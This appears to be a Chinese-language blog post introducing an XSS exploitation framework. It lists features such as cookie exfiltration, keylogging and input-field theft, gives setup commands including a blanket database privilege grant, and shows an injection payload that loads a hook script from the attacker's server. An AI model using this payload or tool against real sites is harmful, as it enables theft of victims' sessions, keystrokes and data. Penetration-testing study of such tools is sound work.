工具简介
XSS Exploitation Tool是一款渗透测试工具,专注于跨站脚本漏洞的利用。
该工具仅用于教育目的,请勿在真实环境中使用它!
工具功能:
- 有关受害浏览器的技术数据
- 受害者的地理位置
- 被吸引/访问过的页面的快照
- 被钩住/访问的页面的源代码
- 窃取输入字段数据
- 渗出cookie
- 键盘记录
- 显示警告框
- 重定向用户
工具安装
在 Debian 11 上测试,您可能需要 Apache、Mysql 数据库和 PHP 模块:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
安装 Git 并提取 XSS-Exploitation-Tool 源代码:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
安装 Composer,然后安装应用程序依赖项:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/
初始化数据库
$ sudo mysql
创建具有特定权限的新用户:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
创建数据库(将产生一个空页):
访问页面 http://server-ip/reset_database.php
修改javascript钩子文件
hook.js 是一个钩子文件 ,您需要将第一行的ip地址替换为XSS利用工具服务器的ip地址:
var address = "your server ip";
工具使用
首先,创建一个页面(或利用跨站脚本漏洞)来插入 Javascript 挂钩文件(请参阅根目录下的exploit.html):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
然后,当受害者访问被挂钩的页面时,XSS利用工具服务器应该列出被挂钩的浏览器:
工具地址
本文共 301 个字数,平均阅读时长 ≈ 1分钟
评论 (0)